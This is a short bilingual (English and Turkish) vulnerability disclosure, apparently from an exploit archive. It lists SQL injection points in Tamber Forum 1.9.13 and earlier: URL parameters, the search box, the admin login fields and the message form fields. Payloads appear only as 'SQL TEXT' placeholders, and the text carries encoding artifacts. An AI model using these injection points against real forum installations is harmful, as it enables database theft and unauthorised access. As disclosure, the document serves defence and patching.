|
ENGLISH=0D
=0D
# Title : Tamber Forum <= 1.9.13 Multiple SQL Injection Vulnerabilities=0D
=0D
# Author : ajann=0D
=0D
# Exploit;=0D
=0D
SQL INJECTİON--------------------------------------------------------=0D
=0D
###http://[target]/[path]/show_forum.asp?frm_id=55'SQL TEXT=0D
=0D
###http://[target]/[path]/forum_search.asp SEARCH FOR:SQL TEXT=0D
=0D
###http://[target]/[path]/admin/index.asp=0D
=0D
Email address: SQL TEXT=0D
Password: SQLTEXT=0D
=0D
###http://[target]/[path]/browse_forum_cat.asp?frm_cat_id=1 SQL TEXT=0D
=0D
###post_message.asp=0D
=0D
Message Subject: SQL TEXT=0D
=0D
Message Text: SQL TEXT=0D
=0D
.=0D
..=0D
.....=0D
=0D
=0D
# ajann,Turkey=0D
=0D
=0D
TURKISH=0D
=0D
# Baslık : Tamber Forum <= 1.9.13 Multiple SQL Injection Vulnerabilities=0D
# A=E7ığı Bulan : ajann=0D
# A=E7ık bulunan dosyalar;=0D
=0D
###http://[target]/[path]/show_forum.asp?frm_id=55'SQL SORGUNUZ=0D
=0D
###http://[target]/[path]/forum_search.asp SEARCH FOR:SQL SORGUNUZ=0D
=0D
###http://[target]/[path]/admin/index.asp=0D
=0D
Email address: SORGUNUZ=0D
Password: SORGUNUZ=0D
=0D
###http://[target]/[path]/browse_forum_cat.asp?frm_cat_id=1 SQL SORGUNUZ=0D
=0D
###post_message.asp=0D
=0D
Message Subject: SORGUNUZ=0D
=0D
Message Text: SORGUNUZ=0D
=0D
.=0D
..=0D
.....=0D
=0D
Acıklama: =0D
Kısacası b=FCt=FCn dosyalarda : ) bulunan filtrelem eksikliği nedeniyle dbden bilgi cekilebilmektedir.=0D
=0D
# ajann,Turkiye